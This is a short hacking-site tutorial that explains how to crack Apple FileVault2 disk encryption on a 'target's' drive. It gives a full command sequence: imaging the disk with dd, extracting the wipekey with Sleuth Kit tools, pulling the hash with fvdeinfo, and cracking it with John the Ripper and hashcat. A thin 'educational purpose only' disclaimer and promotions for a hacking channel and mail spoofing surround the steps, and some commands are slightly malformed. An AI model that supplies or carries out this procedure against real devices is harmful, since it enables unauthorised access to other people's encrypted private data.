in , ,

How to Crack Apple’s FileVault2 Encryption

Here’s The Tut To Crack Apple’s FileVault2 Encryption

Purely For Educational Purpose Only, We Don’t Encourage Any Illegal Activities.

STEP 1: Use dd to extract image of your targets FileVault2 encrypted disk:

sudo dd if=/dev/disk2 of=/path/to/filevault_image.dd

conv = noerr, sync

STEP 2: Install fvde2john from

STEP 3: Use hdiutil to attach to dd image:

hdiutil attach -imagekey diskimage-class=CRawDiskImage -nomount /Volumes/path/to/filevault_image.dd

STEP 4: Obtain the EncryptedRoot.plist.wipekey from “Recovery HD” partition

mmls /Volumes/path/to/filevault_image.dd

fls -r -o 50450752 /Volumes/path/to/filevault_image.dd | grep -i EncryptedRoot


icat -o 50450752 image.raw 130 > EncryptedRoot.plist.wipekey

STEP 5: Verify and note the disk mount point for Apple_Corestorage:

diskutil list

…/dev/disk3s2 Apple_Corestorage

STEP 6: Use EncryptedRoot.plist.wipekey with fvdeinfo to retrieve the hash:

sudo fvdetools/fvdeinfo -e EncryptedRoot.plist.wipekey -p blablah /dev/disk3s2

Will return hash

FINAL STEP: Load this hash into JTR or Hashcat to crack it:

john --format=FVDE-opencl --wordlist=dict.txt hash.txt
hashcat -a 0 -m 16700 hash.txt dict.txt
For More Hacking And Python Tutorials Join This high Quality Hacking Channel:

What do you think?

42 points
Upvote Downvote

Written by Akkie657

Leave a Reply

Your email address will not be published. Required fields are marked *

How To Send Fake Mails – Mail Spoofing Website

x2 NF Premium Accounts